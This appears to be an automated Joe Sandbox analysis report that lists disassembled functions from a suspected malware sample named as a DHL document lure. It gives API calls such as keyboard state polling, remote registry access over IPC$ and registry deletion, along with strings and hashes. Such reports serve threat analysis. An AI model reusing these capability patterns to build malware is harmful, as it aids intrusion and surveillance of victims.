Part of subcall function 0047CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0047CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0047CCF3

Strings

RegDeleteKeyExW, xrefs: 0047CCC9
advapi32.dll, xrefs: 0047CCB8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: efabed42831bea0d84776824f154b62d964cd8ce39b1b7bcecd17ed30929dcbc
Instruction ID: b526d67e72e73fb48bd2b8ceb663a8e957b1de3830f45f813ee167ae50449fdd
Opcode Fuzzy Hash: efabed42831bea0d84776824f154b62d964cd8ce39b1b7bcecd17ed30929dcbc
Instruction Fuzzy Hash: C0318071901128BBD7219B90DCC8EFFBB7CEF46740F00456AA909E2240D6389A459BB8

Function 0045E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0045E6B4

Part of subcall function 0040E551: timeGetTime.WINMM(?,?,0045E6D4), ref: 0040E555

Sleep.KERNEL32(0000000A), ref: 0045E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0045E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0045E727
SetActiveWindow.USER32 ref: 0045E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0045E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0045E773
Sleep.KERNEL32(000000FA), ref: 0045E77E
IsWindow.USER32 ref: 0045E78A
EndDialog.USER32(00000000), ref: 0045E79B

Strings

BUTTON, xrefs: 0045E719

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: a3743c84d6e8489a8949d6a5cad09a7b5febcc016e476dc4155e81ba2e631b22
Instruction ID: e2c5064202ac8c686994d103c9979b7dd76f824764c19243a4c05ccf6ae69f59
Opcode Fuzzy Hash: a3743c84d6e8489a8949d6a5cad09a7b5febcc016e476dc4155e81ba2e631b22
Instruction Fuzzy Hash: 44219874200241AFEB055F22EDC9E2A3B59F75534AF50083AFC51911B2DFB59D049B3C

Function 0045E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045EAA7

Strings

alias PlayMe, xrefs: 0045EA36
status PlayMe mode, xrefs: 0045EA58
close PlayMe, xrefs: 0045EA6E, 0045EA9B
play PlayMe wait, xrefs: 0045EA91
play PlayMe, xrefs: 0045EAA2
open , xrefs: 0045EA0C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: e8dbd20e5f4d83bc57219eae45cf31d3091c2d2365a4524946e097f473fa0f7b
Instruction ID: dc91014354a256df840c4ef1118a820b536ab44b4817d1352c2dcfcfa8b382c7
Opcode Fuzzy Hash: e8dbd20e5f4d83bc57219eae45cf31d3091c2d2365a4524946e097f473fa0f7b
Instruction Fuzzy Hash: 58119171A9022D79D725A7B2DC4AEFF6A7CEBD1B40F10042BB901A60D1EAB80E05C5B4

Function 00455CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00455CE2
GetWindowRect.USER32(00000000,?), ref: 00455CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00455D59
GetDlgItem.USER32(?,00000002), ref: 00455D69
GetWindowRect.USER32(00000000,?), ref: 00455D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00455DCF
GetDlgItem.USER32(?,000003E9), ref: 00455DDD
GetWindowRect.USER32(00000000,?), ref: 00455DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00455E31
GetDlgItem.USER32(?,000003EA), ref: 00455E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00455E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00455E67

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ef846124f822d5ebb45979880061ad9cf44574ecf0e8a3c8a95c22a406d475fc
Instruction ID: 68f4ec4c7399b15aa5fed06fbe030034c976c0590e94e47072334237c65cce04
Opcode Fuzzy Hash: ef846124f822d5ebb45979880061ad9cf44574ecf0e8a3c8a95c22a406d475fc
Instruction Fuzzy Hash: B7512F71A00605AFDB18CFA8DD99AAE7BB5EF48301F108139F915E6291D7749E04CB64

Function 00408BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00408F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00408BE8,?,00000000,?,?,?,?,00408BBA,00000000,?), ref: 00408FC5

DestroyWindow.USER32(?), ref: 00408C81
KillTimer.USER32(00000000,?,?,?,?,00408BBA,00000000,?), ref: 00408D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00446973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00408BBA,00000000,?), ref: 004469A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00408BBA,00000000,?), ref: 004469B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00408BBA,00000000), ref: 004469D4
DeleteObject.GDI32(00000000), ref: 004469E6

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 450c4ccd013d975434d5f14a44cbe4eb6fac08a090564d986166592b97df96e5
Instruction ID: cff51711837a7755d254e110f7c7a09d9aa00feeac3b1f31cc69b681727ae8ed
Opcode Fuzzy Hash: 450c4ccd013d975434d5f14a44cbe4eb6fac08a090564d986166592b97df96e5
Instruction Fuzzy Hash: 8C61C370105600DFEB259F14DA48B2A77F1FB42316F10493EE082A6AB0CB79AC91DF6D

Function 00409838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00409944: GetWindowLongW.USER32(?,000000EB), ref: 00409952

GetSysColor.USER32(0000000F), ref: 00409862

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 3ba0913c4a9d3c5ab2c17812261f1ad6a36a6a1ae097843ebc7cf3bba51138e8
Instruction ID: e56d64e9a509d78ad41d093bb80661f9a5cd843a4067bbc636f30823604fe752
Opcode Fuzzy Hash: 3ba0913c4a9d3c5ab2c17812261f1ad6a36a6a1ae097843ebc7cf3bba51138e8
Instruction Fuzzy Hash: 8E41AB71114650AFDB205F389CC8BBA3765EB46330F14462AF9A2973E3D7359C42DB29

Function 00428D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

.A, xrefs: 0042903A, 00428FD0, 00428FF2

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: .A
API String ID: 0-2826776520
Opcode ID: ed4fd0d8060d62199ee5f7c6ddece3ddc4c89bfc0c1bd70ae6fc6f5912388209
Instruction ID: 8cf2c7effa1f850d3715cad79c7d43916aab17ccac6f92877fc6e067f8a8d725
Opcode Fuzzy Hash: ed4fd0d8060d62199ee5f7c6ddece3ddc4c89bfc0c1bd70ae6fc6f5912388209
Instruction Fuzzy Hash: 94C11975F04259AFCB11DFA9E840BAE7BB0BF09310F44409EE41597392CB799D42CB69

Function 004596E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0043F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00459717
LoadStringW.USER32(00000000,?,0043F7F8,00000001), ref: 00459720

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0043F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00459742
LoadStringW.USER32(00000000,?,0043F7F8,00000001), ref: 00459745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00459866

Strings

Error: , xrefs: 0045981D
%s (%d) : ==> %s: %s %s, xrefs: 0045984A
^ ERROR, xrefs: 004597FB
Line %d (File "%s"):, xrefs: 0045978F
Line %d:, xrefs: 004597A0

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 8f1fb58ec0060c2a96990d64ad1f03418ca4b01bd24330f4c190fa5a0426baa7
Instruction ID: 2f5c110c2837358e32782d9d8956147eaaa1ec517660a7dcb968dd22bdd10b6f
Opcode Fuzzy Hash: 8f1fb58ec0060c2a96990d64ad1f03418ca4b01bd24330f4c190fa5a0426baa7
Instruction Fuzzy Hash: 2241427290021DAACB05FBE1DE86EFE7778AF14341F100066F60576192EB796F48CB65

Function 004506DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 003F6B57: _wcslen.LIBCMT ref: 003F6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004507A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004507BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004507DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00450804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0045082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00450837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045083C

Strings

SOFTWARE\Classes\, xrefs: 0045070E
\CLSID, xrefs: 00450724
\IPC$, xrefs: 00450784

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: bccbd0911d3a65ff2cfe09a53b97dfaad5d2853c832d2ef9617624317697a15d
Instruction ID: e63159ba8d502f5e09db7e3f390aba24c9e38df00547e5dd590cbdf234e98857
Opcode Fuzzy Hash: bccbd0911d3a65ff2cfe09a53b97dfaad5d2853c832d2ef9617624317697a15d
Instruction Fuzzy Hash: 8F41077681022DABDF12EBA4DC95DFEB778BF04390F14412AE905A7261EB745E04CBA4

Function 00473C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00473C5C
CoInitialize.OLE32(00000000), ref: 00473C8A
CoUninitialize.OLE32 ref: 00473C94
_wcslen.LIBCMT ref: 00473D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00473DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00473ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00473F0E
CoGetObject.OLE32(?,00000000,0048FB98,?), ref: 00473F2D
SetErrorMode.KERNEL32(00000000), ref: 00473F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00473FC4
VariantClear.OLEAUT32(?), ref: 00473FD8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 38bb333c1cd1d5b9623b235cf437e14a5e8935e90a19dbefdc8b4a68bc0b1bee
Instruction ID: c612b7ee773fdf2b635ca27ff4364f36e143851711818584a6f7e70554b50af8
Opcode Fuzzy Hash: 38bb333c1cd1d5b9623b235cf437e14a5e8935e90a19dbefdc8b4a68bc0b1bee
Instruction Fuzzy Hash: 9EC177716083059FC710DF28C88496BB7E9FF89749F10895EF98A9B210D734EE06CB56

Function 00467A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00467AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00467B8F
SHGetDesktopFolder.SHELL32(?), ref: 00467BA3
CoCreateInstance.OLE32(0048FD08,00000000,00000001,004B6E6C,?), ref: 00467BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00467C74
CoTaskMemFree.OLE32(?,?), ref: 00467CCC
SHBrowseForFolderW.SHELL32(?), ref: 00467D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00467D7A
CoTaskMemFree.OLE32(00000000), ref: 00467D81
CoTaskMemFree.OLE32(00000000), ref: 00467DD6
CoUninitialize.OLE32 ref: 00467DDC

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 8e7beb451e6128146c6de179ee8cbcc4539d23153eda8771b0af75de6f294b8e
Instruction ID: 1b3dfa480e1c69578b7806e6ca6b33e78142c27a38e5d66da5e481c6d26a6627
Opcode Fuzzy Hash: 8e7beb451e6128146c6de179ee8cbcc4539d23153eda8771b0af75de6f294b8e
Instruction Fuzzy Hash: 13C13B75A04109AFCB14DFA4C884DAEBBF9FF48308B1484A9E91ADB361D734ED45CB94

Function 0048541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00485504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00485515
CharNextW.USER32(00000158), ref: 00485544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00485585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0048559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004855AC

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 8d083cbe078b56b3399334424f043a02bcfec91aa5fd36a269ce03235201f63f
Instruction ID: 16c65f7e30c19403ed214845e6ab053deabf55a2e8c76e4d0bf2e2beb63a21ea
Opcode Fuzzy Hash: 8d083cbe078b56b3399334424f043a02bcfec91aa5fd36a269ce03235201f63f
Instruction Fuzzy Hash: 9261BF70900608EBDF11EF50CC84EFF7BB9EF05721F10485AF925A62A0D7388A81DB69

Function 0044FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0044FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0044FB08
VariantInit.OLEAUT32(?), ref: 0044FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0044FB3A
VariantCopy.OLEAUT32(?,?), ref: 0044FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0044FBA1
VariantClear.OLEAUT32(?), ref: 0044FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0044FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0044FBCC
VariantClear.OLEAUT32(?), ref: 0044FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0044FBE9

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e7b5b33dbdc9705b4981a343610715d9f6382a243faae686ab2f02f61029a568
Instruction ID: 220ce899de65be10a56fe4a29c84f37def32944f1d8faa819a0f92cf537007df
Opcode Fuzzy Hash: e7b5b33dbdc9705b4981a343610715d9f6382a243faae686ab2f02f61029a568
Instruction Fuzzy Hash: 41415F35A002199FDB00DF64D894DAEBBB9FF48744F00847AE915AB261DB34A945CFA4

Function 00459C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00459CA1
GetAsyncKeyState.USER32(000000A0), ref: 00459D22
GetKeyState.USER32(000000A0), ref: 00459D3D
GetAsyncKeyState.USER32(000000A1), ref: 00459D57
GetKeyState.USER32(000000A1), ref: 00459D6C
GetAsyncKeyState.USER32(00000011), ref: 00459D84
GetKeyState.USER32(00000011), ref: 00459D96
GetAsyncKeyState.USER32(00000012), ref: 00459DAE
GetKeyState.USER32(00000012), ref: 00459DC0
GetAsyncKeyState.USER32(0000005B), ref: 00459DD8
GetKeyState.USER32(0000005B), ref: 00459DEA

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c9ab7946bb7f4edeee1501275429b07c6cdd78309a96b533a3c5059749a1895b
Instruction ID: 778489422927b60af10a842d20d1dbf47ef51cc5d508505e7aecb2b1b0e66306
Opcode Fuzzy Hash: c9ab7946bb7f4edeee1501275429b07c6cdd78309a96b533a3c5059749a1895b
Instruction Fuzzy Hash: 5241A6345047C9A9FF31966088443A7BEB06B11345F08805FDEC6567C3E7A99DCCC7AA

Function 0047055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004705BC
inet_addr.WSOCK32(?), ref: 0047061C
gethostbyname.WSOCK32(?), ref: 00470628
IcmpCreateFile.IPHLPAPI ref: 00470636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004706C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004706E5
IcmpCloseHandle.IPHLPAPI(?), ref: 004707B9
WSACleanup.WSOCK32 ref: 004707BF

Strings

Ping, xrefs: 00470676

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

